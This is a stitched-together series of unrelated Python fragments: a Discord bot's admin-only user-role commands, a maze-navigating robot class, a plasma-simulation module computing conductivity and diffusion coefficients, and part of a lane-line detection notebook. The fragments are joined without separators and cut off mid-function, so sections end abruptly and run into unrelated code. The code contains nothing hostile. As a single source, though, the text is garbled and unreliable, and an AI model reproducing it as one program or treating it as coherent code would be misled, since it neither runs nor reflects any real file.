await ctx.send(name + " blocked from the UserRole module.")
else:
await ctx.send(name + " not blocked from the UserRole module.")
@commands.command(pass_context=True)
async def adduserrole(self, ctx, *, role = None):
"""Adds a new role to the user role system (admin only)."""
author = ctx.message.author
server = ctx.message.guild
channel = ctx.message.channel
usage = 'Usage: `{}adduserrole [role]`'.format(ctx.prefix)
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(server, "SuppressMentions"):
suppress = True
else:
suppress = False
isAdmin = author.permissions_in(channel).administrator
# Only allow admins to change server stats
if not isAdmin:
await channel.send('You do not have sufficient privileges to access this command.')
return
if role == None:
await ctx.send(usage)
return
if type(role) is str:
if role == "everyone":
role = "@everyone"
            # It's a string - the hope continues
roleCheck = DisplayName.roleForName(role, server)
if not roleCheck:
msg = "I couldn't find **{}**...".format(role)
if suppress:
msg = Nullify.clean(msg)
await ctx.send(msg)
return
role = roleCheck
# Now we see if we already have that role in our list
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
for aRole in promoArray:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(role.id):
# We found it - throw an error message and return
msg = '**{}** is already in the list.'.format(role.name)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# If we made it this far - then we can add it
promoArray.append({ 'ID' : role.id, 'Name' : role.name })
self.settings.setServerStat(server, "UserRoles", promoArray)
msg = '**{}** added to list.'.format(role.name)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
@adduserrole.error
async def adduserrole_error(self, ctx, error):
# do stuff
        msg = 'adduserrole Error: {}'.format(error)
        await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def removeuserrole(self, ctx, *, role = None):
"""Removes a role from the user role system (admin only)."""
author = ctx.message.author
server = ctx.message.guild
channel = ctx.message.channel
usage = 'Usage: `{}removeuserrole [role]`'.format(ctx.prefix)
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(server, "SuppressMentions"):
suppress = True
else:
suppress = False
isAdmin = author.permissions_in(channel).administrator
# Only allow admins to change server stats
if not isAdmin:
await channel.send('You do not have sufficient privileges to access this command.')
return
if role == None:
await channel.send(usage)
return
if type(role) is str:
if role == "everyone":
role = "@everyone"
            # It's a string - the hope continues
# Let's clear out by name first - then by role id
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
for aRole in promoArray:
# Get the role that corresponds to the name
if aRole['Name'].lower() == role.lower():
# We found it - let's remove it
promoArray.remove(aRole)
self.settings.setServerStat(server, "UserRoles", promoArray)
msg = '**{}** removed successfully.'.format(aRole['Name'])
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# At this point - no name
# Let's see if it's a role that's had a name change
roleCheck = DisplayName.roleForName(role, server)
if roleCheck:
# We got a role
# If we're here - then the role is an actual role
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
for aRole in promoArray:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(roleCheck.id):
# We found it - let's remove it
promoArray.remove(aRole)
self.settings.setServerStat(server, "UserRoles", promoArray)
msg = '**{}** removed successfully.'.format(aRole['Name'])
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# If we made it this far - then we didn't find it
msg = '*{}* not found in list.'.format(roleCheck.name)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# If we're here - then the role is an actual role - I think?
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
for aRole in promoArray:
# Get the role that corresponds to the id
            if str(aRole['ID']) == str(role.id):
# We found it - let's remove it
promoArray.remove(aRole)
self.settings.setServerStat(server, "UserRoles", promoArray)
msg = '**{}** removed successfully.'.format(aRole['Name'])
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# If we made it this far - then we didn't find it
msg = '*{}* not found in list.'.format(role.name)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
@removeuserrole.error
async def removeuserrole_error(self, ctx, error):
# do stuff
        msg = 'removeuserrole Error: {}'.format(error)
        await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def listuserroles(self, ctx):
"""Lists all roles for the user role system."""
server = ctx.message.guild
channel = ctx.message.channel
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(server, "SuppressMentions"):
suppress = True
else:
suppress = False
# Get the array
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
if not len(promoArray):
msg = "There aren't any roles in the user role list yet. Add some with the `{}adduserrole` command!".format(ctx.prefix)
await ctx.channel.send(msg)
return
# Sort by XP first, then by name
# promoSorted = sorted(promoArray, key=itemgetter('XP', 'Name'))
promoSorted = sorted(promoArray, key=lambda x:x['Name'])
roleText = "**__Current Roles:__**\n\n"
for arole in promoSorted:
# Get current role name based on id
foundRole = False
for role in server.roles:
if str(role.id) == str(arole['ID']):
# We found it
foundRole = True
roleText = '{}**{}**\n'.format(roleText, role.name)
if not foundRole:
roleText = '{}**{}** (removed from server)\n'.format(roleText, arole['Name'])
# Check for suppress
if suppress:
roleText = Nullify.clean(roleText)
await channel.send(roleText)
@commands.command(pass_context=True)
async def oneuserrole(self, ctx, *, yes_no = None):
"""Turns on/off one user role at a time (bot-admin only; always on by default)."""
# Check for admin status
isAdmin = ctx.author.permissions_in(ctx.channel).administrator
if not isAdmin:
checkAdmin = self.settings.getServerStat(ctx.guild, "AdminArray")
for role in ctx.author.roles:
for aRole in checkAdmin:
                    # Get the role that corresponds to the id
<filename>robot_motion_planning/code/robot.py
import numpy as np
import json
import random
from sys import stderr
class Robot(object):
def __init__(self, maze_dim):
"""
set up attributes that the robot
will use to learn and navigate the maze. Some initial attributes are
provided based on common information, including the size of the maze
the robot is placed in.
Args:
maze_dim: int providing maze dimensions
(e.g. 12 means that maze has dimensions 12x12)
Returns:
None
"""
self.maze_dim = maze_dim
self.maze_area = maze_dim ** 2.
# robot location tracking variables
self.location_orig = [0, 0]
self.location = [0, 0]
self.location_last = [0, 0]
self.heading = 'up'
# variables to create robot's internal map of the maze
self.maze_grid = np.zeros((maze_dim, maze_dim), dtype=np.int) # Grid for wall locations for each maze.
self.path_grid = np.zeros((maze_dim, maze_dim), dtype=np.int)
        self.visited_grid = np.zeros((maze_dim, maze_dim), dtype=np.int) # visited paths, used for Trémaux's algorithm
        self.visited_grid_previous_heading = np.zeros((maze_dim, maze_dim), dtype=object) # previous headings on visited paths, used for Trémaux's algorithm
# measuring number of steps in which the maze was solved
self.step_count = 0
# Maximum allowed movement units per turn
self.max_movement = 3
self.backtracking = False
        self.is_reversing = False # indicates that a 180-degree turn must be completed (done by two right turns)
# Robot's operational mode
# This decides robot's action when next_move() is called.
self.mode = "explore"
# Flag that indicates the first step of exploration
self.is_beginning = True
#possible path grid values
self.UNVISITED = 0
self.VISITED = 1
self.DOUBLE_VISITED = 2
self.SHORTEST = 3 # marking shortest path, so it can be visualized
# Numbers assigned to open walls in cells.
self.wall_values = {'up': 1,
'right': 2,
'down': 4,
'left': 8}
# Internal robot's maze cell map
# Each number represents a four-bit number that has a bit value of 0 if an edge is closed (walled) and
# 1 if an edge is open (no wall); the 1s register corresponds with the upwards-facing side, the 2s register
# the right side, the 4s register the bottom side, and the 8s register the left side. For example,
# the number 10 means that a square is open on the left and right,
# with walls on top and bottom (0*1 + 1*2 + 0*4 + 1*8 = 10).
# The index origin (0, 0) is at the bottom left
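        # e.g. a cell open only at the top and right has value 1 + 2 = 3,
        # while a fully open cell has value 1 + 2 + 4 + 8 = 15.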
self.maze_map = [[0 for _ in range(maze_dim)] for _ in range(maze_dim)]
# Corresponding new headings after rotating
self.dict_rotation = {'up': ['left', 'right'],
'right': ['up', 'down'],
'down': ['right', 'left'],
'left': ['down', 'up']}
# Opposite directions
self.opposite = {'up': 'down',
'right': 'left',
'down': 'up',
'left': 'right'}
# Vectors for different directions
self.direction_to_vec = {'up': [0, 1],
'right': [1, 0],
'down': [0, -1],
'left': [-1, 0]}
# Rotation matrices
self.rot_matrices = {'left': np.array([(0, 1), (-1, 0)]),
'up': np.array([(1, 0), (0, 1)]),
'right': np.array([(0, -1), (1, 0)])}
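        # e.g. with heading 'up' (vector [0, 1]), a 'left' opening maps to
        # np.dot([0, 1], rot_matrices['left']) = [-1, 0], i.e. the global 'left' direction.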
# Dictionary for backtracking, translates robot's headings into direction relative to the maze
self.direction_to_rotation = {
heading: {directions[0]: -90, directions[1]: 90}
for heading, directions in self.dict_rotation.items()}
# Policy grid which will be created after performing a search algorithm.
self.policy_grid = [['' for _ in range(self.maze_dim)] for _ in
range(self.maze_dim)]
# Text file in which the travelled path will be logged.
self.log_filename = 'robot_path.json'
# create file logging visited path and write head line
with open(self.log_filename, 'w+') as file:
file.write('[step_count, robot_x, robot_y, visited, heading]\n')
# decides whether debug message will be displayed
self.DEBUG = False
def print_debug(self, debug_message):
"""Prints debug message if Debug mode is set to True
Args:
debug_message: string to be printed
Returns:
None
Examples:
            >>> self.print_debug("move robot to the right")
"""
if self.DEBUG == True:
print("[ Debug message ]: {0}".format(debug_message))
def wall_follower(self, sensors):
"""Wall follower algorithm deciding on the next step
The wall follower algorithm works only for simply connected maze types.
Left-hand rule is used.
Args:
sensors: list of three int values indicating number of open squares
in front of the left, center, and right sensors (in that order)
Returns:
rotation, movement
            - rotation: integer indicating the robot’s rotation on that timestep,
                taking one of three values: -90, 90, or 0
                for counterclockwise, clockwise, or no rotation (in that order)
            - movement: integer indicating the robot’s movement on that timestep;
                movement follows the rotation and is in the range [-3, 3] inclusive
Examples:
>>> sensors=[0, 10, 0]
>>> rotation, movement = self.wall_follower(sensors)
"""
movement = 0
rotation = 0
# 1. If you can turn left, do it
if sensors[0] > 0:
movement = 1
rotation = -90
self.print_debug("move left")
# 2. Else (If you can't turn left), if you can continue going straight,
# do it
elif sensors[1] > 0:
movement = 1
rotation = 0
self.print_debug("move 1 forward")
# 3. Else (If you can't do either of the previous steps),
# if you can turn right,do it
elif sensors[2] > 0:
movement = 1
rotation = 90
self.print_debug("move right")
# 4. If you reached a dead end, turn back 180 degrees
# (done in two steps by turning right)
else:
movement = 0
rotation = 90
self.print_debug("dead end, turn to the right, no movement")
return rotation, movement
def update_map(self, possible_directions):
"""Update the robot's internal map using the unblocked (open)
directions detected by the current sensor readings.
Args:
possible_directions: list of possible directions
can contain those values: 'left', 'right', 'forward'
Returns:
None
        Examples:
            >>> possible_directions = ['left', 'up']
            >>> self.update_map(possible_directions)
"""
# Get the unit vector which points in the direction of the robot's heading
movement_vec = np.array(self.direction_to_vec[self.heading])
# First, translate the detected openings into global directions
for direction in possible_directions:
global_dir = None
if direction == 'left':
global_dir = self.dict_rotation[self.heading][0]
elif direction == 'right':
global_dir = self.dict_rotation[self.heading][1]
elif direction == 'up':
global_dir = self.heading
# Get the corresponding wall value for an wall opening in the given direction
wall_value = self.wall_values[global_dir]
# Update the current map cell with the new wall value
self.maze_map[self.location[0]][self.location[1]] |= wall_value
# Rotate robot's direction vector to given direction
dir_vec = np.dot(movement_vec, self.rot_matrices[direction])
# Get the wall opening value for the next cell
wall_value = self.wall_values[self.opposite[global_dir]]
# Update the next map cell with the opening that can be seen from this cell.
# maps entries to deadends.
self.maze_map[self.location[0] + dir_vec[0]][
self.location[1] + dir_vec[1]] |= wall_value
def next_move(self, sensors):
"""
This function determines the next move the robot should make,
based on the input from the sensors after its previous move.
Args:
sensors: inputs are a list of three distances from the robot's left,
front, and right-facing sensors, in that order
Returns:
rotation: indicates desired robot rotation (if any) as a number:
0 for no rotation, +90 for a 90-degree rotation clockwise,
and -90 for a 90-degree rotation counterclockwise.
Other values will result in no rotation.
movement: indicates robot movement, and the robot will attempt
to move the number of indicated squares: a positive number
indicates forwards movement, while a negative number indicates
backwards movement. The robot may move a
maximum of three units per turn. Any excess movement is ignored.
If the robot wants to end a run (e.g. during the first training run in
the maze) then returing the tuple ('Reset', 'Reset') will indicate to
the tester to end the run and return the robot to the start.
"""
rotation = 0
movement = 0
# measure number of steps to solve maze
self.step_count +=1
self.print_debug("=== {0}.step ===".format(self.step_count))
if self.mode == "explore":
# explore and map the complete maze
            rotation,
from IPython import get_ipython
if get_ipython().__class__.__name__ == 'ZMQInteractiveShell':
from tqdm import tqdm_notebook as tqdm
else:
from tqdm import tqdm
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Sarkas Modules
import sarkas.tools.observables as obs
class TransportCoefficient:
"""
Transport Coefficients class.
"""
def __init__(self):
pass
def __repr__(self):
sortedDict = dict(sorted(self.__dict__.items(), key=lambda x: x[0].lower()))
disp = 'Transport( \n'
for key, value in sortedDict.items():
disp += "\t{} : {}\n".format(key, value)
disp += ')'
return disp
@staticmethod
def pretty_print(observable, tc_name):
"""Print to screen the location where data is stored and other relevant information.
Parameters
----------
observable: sarkas.tools.observables.Observable
Physical quantity of the ACF.
tc_name: str
Name of Transport coefficient to calculate.
"""
print('Data saved in: \n', os.path.join(observable.saving_dir, tc_name + '_' + observable.job_id + '.h5'))
print('\nNo. of slices = {}'.format(observable.no_slices))
print('No. dumps per slice = {}'.format(int(observable.slice_steps / observable.dump_step)))
print('Time interval of autocorrelation function = {:.4e} [s] ~ {} w_p T'.format(
observable.dt * observable.slice_steps,
int(observable.dt * observable.slice_steps * observable.total_plasma_frequency)))
@staticmethod
def electrical_conductivity(params,
phase: str = 'production',
compute_acf: bool = True,
no_slices: int = 1,
plot: bool = True,
show: bool = False,
figname: str = None,
**kwargs):
"""
Calculate electrical conductivity from current auto-correlation function.
Parameters
----------
params : sarkas.core.Parameters
Simulation's parameters.
phase : str
Phase to analyze. Default = 'production'.
show : bool
Flag for prompting plot to screen.
Returns
-------
coefficient : pandas.DataFrame
Pandas dataframe containing the value of the transport coefficient as a function of integration time.
"""
print('\n\n{:=^70} \n'.format(' Electrical Conductivity '))
coefficient = pd.DataFrame()
if compute_acf:
jc_acf = obs.ElectricCurrent()
jc_acf.setup(params, phase=phase, no_slices=no_slices, **kwargs)
jc_acf.compute()
else:
jc_acf = obs.ElectricCurrent()
jc_acf.setup(params, phase=phase, no_slices=no_slices, **kwargs)
jc_acf.parse()
# Print some info
TransportCoefficient.pretty_print(jc_acf, 'ElectricalConductivity')
no_int = jc_acf.slice_steps
# to_numpy creates a 2d-array, hence the [:,0]
time = jc_acf.dataframe[("Time")].to_numpy()[:, 0]
coefficient["Time"] = time
jc_str = "Electric Current ACF"
sigma_str = "Electrical Conductivity"
for isl in tqdm(range(jc_acf.no_slices), disable = not jc_acf.verbose):
sigma_ij = np.zeros(jc_acf.slice_steps)
integrand = np.array(jc_acf.dataframe[(jc_str, "Total", "slice {}".format(isl))])
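            # Running trapezoidal integral of the current ACF (normalized by its zero-lag
            # value) up to each lag time: a Green-Kubo-style estimate that should plateau
            # once the ACF has decayed.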
for it in range(1, no_int):
sigma_ij[it] = np.trapz(integrand[:it] / integrand[0], x=time[:it])
coefficient[sigma_str + "_slice {}".format(isl)] = sigma_ij[:]
col_str = [sigma_str + "_slice {}".format(isl) for isl in range(jc_acf.no_slices)]
coefficient[sigma_str + "_Mean"] = coefficient[col_str].mean(axis=1)
coefficient[sigma_str + "_Std"] = coefficient[col_str].std(axis=1)
coefficient.columns = pd.MultiIndex.from_tuples([tuple(c.split("_")) for c in coefficient.columns])
coefficient.to_hdf(
os.path.join(jc_acf.saving_dir, 'ElectricalConductivity_' + jc_acf.job_id + '.h5'),
mode='w',
key='conductivity',
index=False)
if plot or figname:
# Make the plot
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(16, 7))
ax3 = ax1.twiny()
ax4 = ax2.twiny()
# extra space for the second axis at the bottom
# fig.subplots_adjust(bottom=0.2)
acf_avg = jc_acf.dataframe[(jc_str, "Total", "Mean")]
acf_std = jc_acf.dataframe[(jc_str, "Total", "Std")]
d_avg = coefficient[(sigma_str, "Mean")]
d_std = coefficient[(sigma_str, "Std")]
# Calculate axis multipliers and labels
xmul, ymul, _, _, xlbl, ylbl = obs.plot_labels(time, d_avg, "Time", "Conductivity", jc_acf.units)
# ACF
ax1.plot(xmul * time, acf_avg / acf_avg.iloc[0], label=r'Current $J$')
ax1.fill_between(
xmul * time,
(acf_avg + acf_std) / (acf_avg.iloc[0] + acf_std.iloc[0]),
(acf_avg - acf_std) / (acf_avg.iloc[0] - acf_std.iloc[0]), alpha=0.2)
# Coefficient
ax2.plot(xmul * time, ymul * d_avg, label=r'$\sigma$')
ax2.fill_between(xmul * time, ymul * (d_avg + d_std), ymul * (d_avg - d_std), alpha=0.2)
xlims = (xmul * time[1], xmul * time[-1] * 1.5)
ax1.set(xlim=xlims, xscale='log', ylabel=r'Electric Current ACF', xlabel=r"Time difference" + xlbl)
ax2.set(xlim=xlims, xscale='log', ylabel=r'Conductivity' + ylbl, xlabel=r"$\tau$" + xlbl)
ax1.legend(loc='best')
ax2.legend(loc='best')
# Finish the index axes
for axi in [ax3, ax4]:
axi.grid(alpha=0.1)
axi.set(xlim=(1, jc_acf.slice_steps * 1.5), xscale='log', xlabel='Index')
fig.tight_layout()
if figname:
fig.savefig(os.path.join(jc_acf.saving_dir, figname))
else:
fig.savefig(os.path.join(jc_acf.saving_dir, 'Plot_ElectricConductivity_' + jc_acf.job_id + '.png'))
if show:
fig.show()
return coefficient
@staticmethod
def diffusion(params,
phase: str = 'production',
compute_acf: bool = True,
no_slices: int = 1,
plot: bool = True,
show: bool = False,
figname: str = None,
**kwargs):
"""
Calculate the self-diffusion coefficient from the velocity auto-correlation function.
Parameters
----------
params : sarkas.core.Parameters
Simulation's parameters.
phase : str, optional
Phase to analyze. Default = 'production'.
compute_acf : bool, optional
Flag for recalculating the ACF. Default = True.
If False it will read in the data from the dataframe.
no_slices : int, optional
Number of slices of the simulation. Default = 1.
plot : bool, optional
Flag to plot transport coefficient with corresponding autocorrelation function. Default = True.
show : bool, optional
Flag for prompting plot to screen.
figname : str, optional
Name with which to save the file. It automatically saves it in the correct directory.
**kwargs:
Arguments to pass :meth:`sarkas.tools.observables.VelocityAutoCorrelationFunction`
Returns
-------
coefficient : pandas.DataFrame
Pandas dataframe containing the value of the transport coefficient as a function of integration time.
"""
print('\n\n{:=^70} \n'.format(' Diffusion Coefficient '))
coefficient = pd.DataFrame()
if compute_acf:
vacf = obs.VelocityAutoCorrelationFunction()
vacf.setup(params, phase=phase, no_slices=no_slices, **kwargs)
vacf.compute()
else:
vacf = obs.VelocityAutoCorrelationFunction()
vacf.setup(params, phase=phase, no_slices=no_slices, **kwargs)
vacf.parse()
TransportCoefficient.pretty_print(vacf, 'Diffusion')
time = vacf.dataframe["Time"].to_numpy()[:, 0]
coefficient["Time"] = time
vacf_str = 'VACF'
const = 1.0 / 3.0
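        # The 1/3 comes from averaging the three Cartesian components in the
        # Green-Kubo relation D = (1/3) * integral of <v(0) . v(t)> dt.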
if not params.magnetized:
# Loop over time slices
for isl in tqdm(range(vacf.no_slices), disable = not vacf.verbose):
# Initialize the temporary diffusion container
D = np.zeros((params.num_species, vacf.slice_steps))
# Iterate over the number of species
for i, sp in enumerate(params.species_names):
sp_vacf_str = "{} ".format(sp) + vacf_str
# Grab vacf data of each slice
integrand = np.array(vacf.dataframe[(sp_vacf_str, "Total", "slice {}".format(isl))])
# Integrate each timestep
for it in range(1, len(time)):
D[i, it] = const * np.trapz(integrand[:it], x=time[:it])
coefficient["{} Diffusion_slice {}".format(sp, isl)] = D[i, :]
# Average and std of each diffusion coefficient.
for isp, sp in enumerate(params.species_names):
col_str = ["{} Diffusion_slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
coefficient["{} Diffusion_Mean".format(sp)] = coefficient[col_str].mean(axis=1)
coefficient["{} Diffusion_Std".format(sp)] = coefficient[col_str].std(axis=1)
else:
# Loop over time slices
for isl in tqdm(range(vacf.no_slices), disable = not vacf.verbose):
# Initialize the temporary diffusion container
D = np.zeros((params.num_species, 2, len(time)))
# Iterate over the number of species
for i, sp in enumerate(params.species_names):
sp_vacf_str = "{} ".format(sp) + vacf_str
integrand_par = np.array(vacf.dataframe[(sp_vacf_str, 'Z', "slice {}".format(isl))])
integrand_perp = np.array(vacf.dataframe[(sp_vacf_str, 'X', "slice {}".format(isl))]) + \
np.array(vacf.dataframe[(sp_vacf_str, 'Y', "slice {}".format(isl))])
for it in range(1, len(time)):
D[i, 0, it] = np.trapz(integrand_par[:it], x=time[:it])
D[i, 1, it] = 0.5 * np.trapz(integrand_perp[:it], x=time[:it])
coefficient["{} Parallel Diffusion_slice {}".format(sp, isl)] = D[i, 0, :]
coefficient["{} Perpendicular Diffusion_slice {}".format(sp, isl)] = D[i, 1, :]
# Add the average and std of perp and par VACF to its dataframe
for isp, sp in enumerate(params.species_names):
par_col_str = ["{} Z Velocity ACF slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
vacf.dataframe["{} Parallel Velocity ACF avg".format(sp)] = vacf.dataframe[par_col_str].mean(axis=1)
vacf.dataframe["{} Parallel Velocity ACF std".format(sp)] = vacf.dataframe[par_col_str].std(axis=1)
x_col_str = ["{} X Velocity ACF slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
y_col_str = ["{} Y Velocity ACF slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
perp_vacf = 0.5 * (np.array(vacf.dataframe[x_col_str]) + np.array(vacf.dataframe[y_col_str]))
vacf.dataframe["{} Perpendicular Velocity ACF avg".format(sp)] = perp_vacf.mean(axis=1)
vacf.dataframe["{} Perpendicular Velocity ACF std".format(sp)] = perp_vacf.std(axis=1)
# Average and std of each diffusion coefficient.
par_col_str = ["{} Parallel Diffusion slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
perp_col_str = ["{} Perpendicular Diffusion slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
coefficient["{} Parallel Diffusion avg".format(sp)] = coefficient[par_col_str].mean(axis=1)
coefficient["{} Parallel Diffusion std".format(sp)] = coefficient[par_col_str].std(axis=1)
coefficient["{} Perpendicular Diffusion avg".format(sp)] = coefficient[perp_col_str].mean(axis=1)
coefficient["{} Perpendicular Diffusion std".format(sp)] = coefficient[perp_col_str].std(axis=1)
# Save the updated dataframe
vacf.dataframe.to_csv(vacf.filename_csv, index=False, encoding='utf-8')
# Endif magnetized.
coefficient.columns = pd.MultiIndex.from_tuples([tuple(c.split("_")) for c in coefficient.columns])
# Save the coefficient's data
coefficient.to_hdf(
os.path.join(vacf.saving_dir, 'Diffusion_' + vacf.job_id + '.h5'),
mode='w',
key='diffusion')
if plot or figname:
# Make the plot
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(16, 7))
# index axes
ax3 = ax1.twiny()
ax4 = ax2.twiny()
# extra space for the second axis at the bottom
fig.subplots_adjust(bottom=0.2)
if not params.magnetized:
for isp, sp in enumerate(params.species_names):
sp_vacf_str = "{} ".format(sp) + vacf_str
acf_avg = vacf.dataframe[(sp_vacf_str, "Total", "Mean")]
acf_std = vacf.dataframe[(sp_vacf_str, "Total", "Std")]
d_avg = coefficient[("{} Diffusion".format(sp), "Mean")]
d_std = coefficient[("{} Diffusion".format(sp), "Std")]
# Calculate axis multipliers and labels
xmul, ymul, _, _, xlbl, ylbl = obs.plot_labels(time, d_avg, "Time", "Diffusion", vacf.units)
ax1.plot(xmul * time, acf_avg / acf_avg[0], label=r'$D_{' + sp + '}$')
ax1.fill_between(
xmul * time,
(acf_avg + acf_std) / (acf_avg[0] + acf_std[0]),
(acf_avg - acf_std) / (acf_avg[0] - acf_std[0]), alpha=0.2)
ax2.plot(xmul * time, ymul * d_avg, label=r'$D_{' + sp + '}$')
                ax2.fill_between(xmul * time, ymul * (d_avg + d_std),
            sq_distance = (y2 - y1) * (y2 - y1) + (x2 - x1) * (x2 - x1)
# print("line: slope={:.2f}, x_mid={:.2f}, intercept={:.2f}:({:.2f},{:.2f})-({:.2f},{:.2f})".format(
# slope, x_mid, intercept, x1, y1, x2, y2))
if (slope >= min_pos_slope) and (slope <= max_pos_slope):
pos_slopes.append(slope)
pos_intercepts.append(intercept)
pos_sq_distances[pos_len] = sq_distance
pos_x_mids.append(x_mid)
pos_len += 1
# print('Appended slope = {:.2f}'.format(slope))
elif (slope <= max_neg_slope) and (slope >= min_neg_slope):
neg_slopes.append(slope)
neg_intercepts.append(intercept)
neg_sq_distances[neg_len] = sq_distance
neg_x_mids.append(x_mid)
neg_len += 1
# print('Appended slope = {:.2f}'.format(slope))
else:
# print('Excluded line with slope = {:.2f}'.format(slope))
pass
# print('Pos slopes:', pos_slopes)
# print('Pos x_mids:', pos_x_mids)
# print('Pos intercepts:', pos_intercepts)
# print('Neg slopes:', neg_slopes)
# print('Neg x_mids:', neg_x_mids)
# print('Neg intercepts:', neg_intercepts)
pos_len = len(pos_slopes)
y1 = img.shape[0] - 1
y2 = int(img.shape[0]*5/8)
if pos_len > 0:
# # # pos_median_index = np.argsort(pos_slopes)[len(pos_slopes) // 2]
# # pos_mid1 = pos_slopes.index(np.percentile(pos_slopes, 25, interpolation='nearest'))
# # pos_mid2 = pos_slopes.index(np.percentile(pos_slopes, 75, interpolation='nearest'))
# pos_sq_distance_max_index = pos_sq_distances.argmax()
# # # pos_slope = pos_slopes[neg_median_index]
# # pos_slope = np.average(pos_slopes[pos_mid1:pos_mid2+1])
# pos_slope = pos_slopes[pos_sq_distance_max_index]
# # # pos_intercept = pos_intercepts[pos_median_index]
# # pos_intercept = np.average(pos_intercepts[pos_mid1:pos_mid2+1])
# pos_intercept = pos_intercepts[pos_sq_distance_max_index]
pos_slope = np.average(pos_slopes)
pos_x_mid = np.average(pos_x_mids)
# pos_intercept = np.average(pos_intercepts)
pos_slope, pos_x_mid = moving_averages(pos_slope, pos_x_mid, 'pos')
pos_intercept = y_mid - pos_slope * pos_x_mid
x1 = int((y1 - pos_intercept)/pos_slope)
x2 = int((y2 - pos_intercept)/pos_slope)
lines_new.append([[x1, y1, x2, y2]])
# print("pos laneline: slope={:.2f}, x_mid={:.2f}, intercept={:.2f}:({:.2f},{:.2f})-({:.2f},{:.2f})".format(
# pos_slope, pos_x_mid, pos_intercept, x1,y1,x2,y2))
neg_len = len(neg_slopes)
if neg_len > 0:
# # # neg_median_index = np.argsort(neg_slopes)[len(neg_slopes) // 2]
# # neg_mid1 = neg_slopes.index(np.percentile(neg_slopes, 25, interpolation='nearest'))
# # neg_mid2 = neg_slopes.index(np.percentile(neg_slopes, 75, interpolation='nearest'))
# neg_sq_distance_max_index = neg_sq_distances.argmax()
# # # neg_slope = neg_slopes[neg_median_index]
# # neg_slope = np.average(neg_slopes[neg_mid1:neg_mid2+1])
# neg_slope = neg_slopes[neg_sq_distance_max_index]
# # # neg_intercept = neg_intercepts[neg_median_index]
# # neg_intercept = np.average(neg_slopes[neg_mid1:neg_mid2+1])
# neg_intercept = neg_intercepts[neg_sq_distance_max_index]
neg_slope = np.average(neg_slopes)
neg_x_mid = np.average(neg_x_mids)
neg_slope, neg_x_mid = moving_averages(neg_slope, neg_x_mid, 'neg')
# neg_intercept = np.average(neg_intercepts)
neg_intercept = y_mid - neg_slope * neg_x_mid
x1 = int((y1 - neg_intercept)/neg_slope)
x2 = int((y2 - neg_intercept)/neg_slope)
lines_new.append([[x1, y1, x2, y2]])
# print("neg laneline: slope={:.2f}, x_mid={:.2f}, intercept={:.2f}:({:.2f},{:.2f})-({:.2f},{:.2f})".format(
# neg_slope, neg_x_mid, neg_intercept, x1,y1,x2,y2))
draw_lines(line_img, lines_new)
# cv2.imshow('before_lines', img)
# temp = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
# draw_lines(temp, lines)
# cv2.imshow('lines_original', temp)
# temp2 = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
# draw_lines(temp2, lines_new)
# cv2.imshow('lane_lines', temp2)
# cv2.waitKey(1000)
return line_img
# Python 3 has support for cool math symbols.
def weighted_img(img, initial_img, α=0.8, β=1., γ=0.):
"""
    `img` is the output of hough_lines(): an image with lines drawn on it.
    It should be a blank image (all black) with only the lines drawn on it.
`initial_img` should be the image before any processing.
The result image is computed as follows:
initial_img * α + img * β + γ
NOTE: initial_img and img must be the same shape!
"""
return cv2.addWeighted(initial_img, α, img, β, γ)
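# A small, self-contained sanity check of weighted_img() (not part of the original
# notebook). It blends a synthetic line image onto a blank frame; the `_demo_*`
# array names are illustrative only.
_demo_frame = np.zeros((540, 960, 3), dtype=np.uint8)            # stand-in for a road image
_demo_lines = np.zeros_like(_demo_frame)
cv2.line(_demo_lines, (100, 539), (480, 330), (0, 0, 255), 10)   # one fake lane line
_demo_overlay = weighted_img(_demo_lines, _demo_frame, 0.8, 1., 0.)
assert _demo_overlay.shape == _demo_frame.shape and _demo_overlay.dtype == np.uint8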
# ## Test Images
#
# Build your pipeline to work on the images in the directory "test_images"
# **You should make sure your pipeline works well on these images before you try the videos.**
# In[4]:
import os
os.listdir("test_images/")
# ## Build a Lane Finding Pipeline
#
#
# Build the pipeline and run your solution on all test_images. Make copies into the `test_images_output` directory, and you can use the images in your writeup report.
#
# Try tuning the various parameters, especially the low and high Canny thresholds as well as the Hough lines parameters.
# In[8]:
# TODO: Build your pipeline that will draw lane lines on the test_images
# then save them to the test_images_output directory.
def lane_finding_pipeline(image):
# get gray scale first since all processing steps are on grayscale only
gray = grayscale(image)
# Define a kernel size and apply Gaussian smoothing
kernel_size = 5
blur_gray = gaussian_blur(gray, kernel_size)
# Define our parameters for Canny and apply
low_threshold = 60
high_threshold = 120
edges = canny(blur_gray, low_threshold, high_threshold)
